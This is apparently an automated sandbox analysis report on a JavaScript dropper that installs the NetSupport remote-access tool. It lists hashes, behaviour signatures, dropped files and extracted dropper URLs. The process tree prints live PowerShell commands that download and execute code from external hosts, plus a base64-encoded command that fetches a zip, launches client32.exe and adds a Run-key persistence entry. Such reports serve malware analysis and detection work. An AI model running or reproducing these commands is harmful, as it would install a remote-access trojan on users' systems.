Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-03-2024 02:45

General

  • Target

    c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4.js

  • Size

    64KB

  • MD5

    f6348f862b8f28e11adbf34af26b6159

  • SHA1

    e974cab2e791d8d9d403ec4bac9a03e3e936392f

  • SHA256

    c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4

  • SHA512

    9cdb49496c9ede1f275df93df89476cd6de424419058d6a2a3e0db22a98d6248ce9cba180927723bc22beaeb82b733c59f5ade8d38b5773536efdddb0bd745bd

  • SSDEEP

    1536:xz+pSx9UjeO+rANwbKkpddIVEZDZ/yMl+QQiZkkBLAoEUETvSvKCHCCD5V3KxFEC:AK9UjeO+rAqbKkpddIVEZDZ/yMl+QQiY

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://compactgrill.hu/care.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://whatisfurosemide.com/f877c2e5-2949-4498-af83-6a5c5jd37342a.txt

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopROF -exeCu byPasS -WiNDows hI -E QwBoAGQAaQByACAAJABFAG4AdgA6AEwAbwBDAEEAbABhAHAAcABkAEEAVABhADsAIAAkAGsAbQAxAGgAVABRAEIARwA9AFsAYgB5AHQAZQBbAF0AXQBAACgAOAAwACwAIAA3ADUALAAgADMALAAgADQAKQA7ACAAJABIADQAYgB1AEwAVAA9ACcAaAB0AHQAcAA6AC8ALwB3AGgAYQB0AGkAcwBmAHUAcgBvAHMAZQBtAGkAZABlAC4AYwBvAG0ALwBmADgANwA3AGMAMgBlADUALQAyADkANAA5AC0ANAA0ADkAOAAtAGEAZgA4ADMALQA2AGEANQBjADUAagBkADMANwAzADQAMgBhAC4AdAB4AHQAJwA7ACAAJABhADQARABuAEYAWgB2ADAAPQAnAEMAaQBRAFYAOQBOAC4AegBpAHAAJwA7ACAAJAB1AGIAYgB2AEoAPQAnAFMAdABhAGIAbABlACAAZgBvAGwAZABlAHIAIABtAGEAbgBhAGcAZQByACAAKABtAGEAcgAuADAANAApACcAOwAgACQAawBIAFIAbgBDAGoAPQBpAG4AVgBPAEsAZQAtAFcARQBCAHIARQBxAHUARQBzAFQAIAAtAHUAcgBpACAAJABIADQAYgB1AEwAVAAgAC0AVQBTAGUAYgBBAFMAaQBjAHAAYQBSAFMASQBOAEcAOwAgACQAOQBDAHkAQQBlADQAVQBDAD0AJABrAEgAUgBuAEMAagAuAEMAbwBOAFQARQBOAFQAOwAgACQAZQB4AHMAOABaAFQAPQAkAEUAbgB2ADoATABvAEMAQQBsAGEAcABwAGQAQQBUAGEALAAgACQAdQBiAGIAdgBKACAALQBqAE8AaQBuACAAJwBcACcAOwAgACQAYwAwAEoAQwBvAGIAQwA9AEoATwBJAE4ALQBwAEEAVABIACAALQBQAGEAVABIACAAJABFAG4AdgA6AEwAbwBDAEEAbABhAHAAcABkAEEAVABhACAALQBDAEgAaQBMAGQAcABhAFQAaAAgACQAYQA0AEQAbgBGAFoAdgAwADsAIAAkAGcASABVAEYAdQA9AFsAQwBvAG4AdgBFAHIAVABdADoAOgBGAFIAbwBNAGIAQQBzAGUANgA0AHMAVABSAEkAbgBnACgAJAA5AEMAeQBBAGUANABVAEMAKQA7ACAAJABEAFgARgBpAFUAPQAkAGcASABVAEYAdQAgAC0AUwBwAGwASQB0ACAAJwAgACcAIAAtAGEAcwAgAFsAQgB5AHQAZQBbAF0AXQA7ACAAJABCAHMAQwBtAHcARABwAD0AJABrAG0AMQBoAFQAUQBCAEcAKwAkAEQAWABGAGkAVQA7ACAAcwBFAHQALQBDAG8AbgBUAGUATgBUACAAJABhADQARABuAEYAWgB2ADAAIAAkAEIAcwBDAG0AdwBEAHAAIAAtAEUATgBDAE8AZABJAE4ARwAgAEIAWQBUAEUAOwAgAEUAWABQAEEATgBEAC0AQQByAGMAaABJAFYAZQAgAC0AUABhAHQAaAAgACQAYwAwAEoAQwBvAGIAQwAgAC0ARABlAFMAdABpAG4AQQBUAGkATwBuAHAAYQBUAEgAIAAkAGUAeABzADgAWgBUACAALQBmAE8AcgBDAEUAOwAgAHIAZQBtAG8AdgBlAC0ASQBUAEUAbQAgACQAYQA0AEQAbgBGAFoAdgAwADsAIABDAEQAIAAkAGUAeABzADgAWgBUADsAIAAkAFcAaQBFAEUAYQB3AD0AIgAkAGUAeABzADgAWgBUAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAAcwB0AGEAcgB0ACAAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAOwAgAG4AZQB3AC0ASQBUAEUAbQBQAHIAbwBwAGUAUgB0AHkAIAAtAHAAQQB0AEgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAEUAIAAkAHUAYgBiAHYASgAgAC0AdgBBAGwAdQBFACAAJABXAGkARQBFAGEAdwAgAC0AUAByAE8AUABFAHIAVABZAFQAWQBQAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3396
        • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\client32.exe
          "C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\client32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2388

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    512c6cab650bfda6ef2995f6b515ed6f

    SHA1

    fec40abf4f5d74ea7f8828cee83770e423203083

    SHA256

    84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262

    SHA512

    638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    0f6a3762a04bbb03336fb66a040afb97

    SHA1

    0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

    SHA256

    36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

    SHA512

    cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\HTCTL32.DLL

    Filesize

    320KB

    MD5

    2d3b207c8a48148296156e5725426c7f

    SHA1

    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

    SHA256

    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

    SHA512

    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\MSVCR100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\NSM.LIC

    Filesize

    259B

    MD5

    866c96ba2823ac5fe70130dfaaa08531

    SHA1

    892a656da1ea264c73082da8c6e5f5728abcb861

    SHA256

    6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921

    SHA512

    0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\PCICAPI.dll

    Filesize

    32KB

    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\PCICHEK.DLL

    Filesize

    18KB

    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\PCICL32.DLL

    Filesize

    1.5MB

    MD5

    5c298cbfa4d1c3c369d6e0a79c0b429e

    SHA1

    b86a1fc55a92b9d9ad7f5d54fb9cef9b062c097b

    SHA256

    02119425e7831df403cc5b00aa9cd4fd6d6b8174063ec32d5bfa9edd3dd6660d

    SHA512

    00cd46736ed64080bebd74e9877f45e79df16017bab757245573688b16fddf26bf296ddf417cd9584aaf87f63edd728549e52b965c2fac33a608e7d0b60c97f7

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\PCICL32.dll

    Filesize

    2.0MB

    MD5

    d4ed9d3f1a41075cddf262dd84fafa26

    SHA1

    2d800052fd4666ebd042c9057df4e093f248bedd

    SHA256

    5b76d438109b494db19e2d160ea6b32e0cb843223dceacffa7c0d0efdc17c959

    SHA512

    fb0fc6b01bf68aa723a685ac596e13fc7e8ce125eef381edc0a65808484b01870d644dec7a5c97ffb7c76de05abcf0cbe5011f0f784276e7673757053a218972

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\client32.exe

    Filesize

    117KB

    MD5

    a2b46c59f6e7e395d479b09464ecdba0

    SHA1

    92c132307dd21189b6d7912ddd934b50e50d1ec1

    SHA256

    89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1

    SHA512

    4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

  • C:\Users\Admin\AppData\Local\Stable folder manager (mar.04)\client32.ini

    Filesize

    638B

    MD5

    5a017da03df76f4e2077fd2c4a115b1b

    SHA1

    2a79863853d4caa243571c0055c228e079d82339

    SHA256

    1a4a43c52c289f6f56cbfa56256cff5e9adfd3e78097a94ed4b69490b8c5469d

    SHA512

    580483c8a6c05dba738a4939e6740ed7698ab7efe54da6db8af273fe7507944b63e562377837ad110d0d645293ea7178fca64fecb197688d614d83854f172f02

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1elzhez.lf5.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1368-21-0x00007FFB08E80000-0x00007FFB09941000-memory.dmp

    Filesize

    10.8MB

  • memory/1368-25-0x00000164D9EC0000-0x00000164D9ED0000-memory.dmp

    Filesize

    64KB

  • memory/1368-90-0x00007FFB08E80000-0x00007FFB09941000-memory.dmp

    Filesize

    10.8MB

  • memory/1368-11-0x00000164D9EC0000-0x00000164D9ED0000-memory.dmp

    Filesize

    64KB

  • memory/1368-10-0x00007FFB08E80000-0x00007FFB09941000-memory.dmp

    Filesize

    10.8MB

  • memory/1368-5-0x00000164D9E70000-0x00000164D9E92000-memory.dmp

    Filesize

    136KB

  • memory/3396-24-0x0000020664220000-0x0000020664230000-memory.dmp

    Filesize

    64KB

  • memory/3396-75-0x00007FFB08E80000-0x00007FFB09941000-memory.dmp

    Filesize

    10.8MB

  • memory/3396-32-0x0000020664080000-0x000002066408A000-memory.dmp

    Filesize

    40KB

  • memory/3396-31-0x0000020666550000-0x0000020666562000-memory.dmp

    Filesize

    72KB

  • memory/3396-30-0x0000020664220000-0x0000020664230000-memory.dmp

    Filesize

    64KB

  • memory/3396-28-0x0000020664220000-0x0000020664230000-memory.dmp

    Filesize

    64KB

  • memory/3396-27-0x0000020664220000-0x0000020664230000-memory.dmp

    Filesize

    64KB

  • memory/3396-26-0x00007FFB08E80000-0x00007FFB09941000-memory.dmp

    Filesize

    10.8MB

  • memory/3396-23-0x0000020664220000-0x0000020664230000-memory.dmp

    Filesize

    64KB

  • memory/3396-22-0x00007FFB08E80000-0x00007FFB09941000-memory.dmp

    Filesize

    10.8MB